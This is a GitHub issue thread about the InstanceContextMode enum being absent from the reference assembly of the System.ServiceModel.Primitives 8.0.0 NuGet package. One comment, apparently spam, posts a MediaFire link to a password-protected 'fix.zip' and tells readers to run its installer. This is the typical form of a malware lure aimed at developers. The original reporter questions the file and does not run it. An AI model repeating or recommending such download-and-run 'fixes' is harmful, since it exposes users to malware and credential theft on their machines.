### ISSUE TITLE
System.ServiceModel.InstanceContextMode not found in System.ServiceModel.Primitives (8.0.0, and lower) nuget package

### ISSUE THREAD

**Issue by kankman** [dotnet/sdk#42999]
I added the nuget package "system.servicemodel.primitives" (8.0.0). The enum InstanceContextMode is not present there.

The source Code of the enum is here [InstanceContextMode.cs](src/System.ServiceModel.Primitives/src/System/ServiceModel/InstanceContextMode.cs) on git . The decompiled source of the dll in lib folder of the nuget package looks the same (everything right).

I found out, that the file used in the project is in ref folder not in lib. The file sizes differ extremely:
In ref folder: 113KB
In lib folder: 2.28MB

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by kankman** [comment]
Sorry for being sceptical to a strange file from the internet. What would the installier do, if I would execute it? The issue seems to be in the nuget package itself, does it?

I could have fixed it locally by creating a new nuget package out of the old one and upload it to our local nuget server. But after updating to the next framework version it would be obsolete.
